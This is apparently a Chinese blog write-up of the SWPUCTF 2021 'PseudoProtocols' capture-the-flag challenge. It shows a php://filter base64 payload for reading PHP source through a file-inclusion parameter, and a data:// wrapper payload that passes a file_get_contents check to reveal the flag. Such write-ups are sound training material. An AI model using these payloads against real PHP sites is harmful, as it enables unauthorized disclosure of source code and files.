[SWPUCTF 2021 新生赛]PseudoProtocols

[SWPUCTF 2021 新生赛]PseudoProtocols

打开靶机之后看到提示说可以在hint.php中去找,而且地址里面有参数wllm猜测是使用php伪协议进行读取

?file=php://filter/convert.base64-encode/resource=目标文件

对base64编码进行解码得到

提示说让我们去test2222222222222.php文件进行查找,得到php脚本

 <?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?> 

包含名为"flag.php"的文件,从URL中获取参数"a"的值,并将其赋值给变量$a,断变量$a是否已设置且其对应的文件内容是否等于字符串"I want flag",果条件成立,则输出"success",并显示变量$flag的值。

为此我们使用data://协议进行传输(数据流封装器,以传递相应格式的数据)

?a=data://text/plain,I want flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值